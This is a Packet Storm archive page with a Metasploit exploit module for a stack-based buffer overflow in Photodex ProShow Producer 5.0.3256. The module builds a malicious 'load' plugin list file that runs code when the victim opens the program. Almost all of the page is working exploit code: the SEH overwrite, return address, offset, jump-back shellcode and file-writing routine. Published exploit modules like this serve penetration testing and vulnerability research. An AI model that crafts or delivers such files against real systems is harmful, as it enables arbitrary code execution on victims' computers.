exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Photodex ProShow Producer 5.0.3256 Buffer Overflow

Photodex ProShow Producer 5.0.3256 Buffer Overflow
Posted Jul 26, 2012
Authored by mr.pr0n, Julien Ahrens, juan | Site metasploit.com

This Metasploit module exploits a stack-based buffer overflow in Photodex ProShow Producer version 5.0.3256 in the handling of the plugins load list file. An attacker must send the crafted "load" file to victim, who must store it in the installation directory. The vulnerability will be triggered the next time ProShow is opened. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.

tags | exploit, overflow
systems | windows
advisories | OSVDB-83745
SHA-256 | bf2514d474a7b08d3b8119c8f11509c92a1414014f2de791e9a5e94b2b9e0c03

Photodex ProShow Producer 5.0.3256 Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
include Msf::Auxiliary::Report

def initialize(info = {})
super(update_info(info,
'Name' => 'Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Photodex ProShow Producer
v5.0.3256 in the handling of the plugins load list file. An attacker must send the
crafted "load" file to victim, who must store it in the installation directory. The
vulnerability will be triggered the next time ProShow is opened. The module has been
tested successfully on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' => [
'Julien Ahrens', # Vulnerability discovery and PoC
'mr.pr0n', # Additional PoC
'juan', # Metasploit module
],
'References' =>
[
[ 'OSVDB', '83745' ],
[ 'EDB', '19563' ],
[ 'EDB', '20036' ],
[ 'URL', 'http://security.inshell.net/advisory/30' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 9844,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[
'Photodex ProShow Producer 5.0.3256 / Windows XP SP3 / Windows 7 SP1',
{
'Offset' => 9844,
'Ret' => 0x1022A959 # p/p/r from if.dnt
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Jun 06 2012',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'load']),
], self.class)
end

# Overriding file_create to allow the creation of a file without extension
def file_create(data)

fname = datastore['FILENAME']
ltype = "exploit.fileformat.#{self.shortname}"

if ! ::File.directory?(Msf::Config.local_directory)
FileUtils.mkdir_p(Msf::Config.local_directory)
end

path = File.join(Msf::Config.local_directory, fname)
full_path = ::File.expand_path(path)
File.open(full_path, "wb") { |fd| fd.write(data) }

report_note(:data => full_path.dup, :type => "#{ltype}.localpath")

print_good "#{fname} stored at #{full_path}"

end

def exploit

sploit = payload.encoded
sploit << generate_seh_record(target.ret)
# jmp back to the payload
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset']+8}").encode_string
# cause exception hitting the end of the stack
sploit << rand_text(300)

print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)

end

end
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close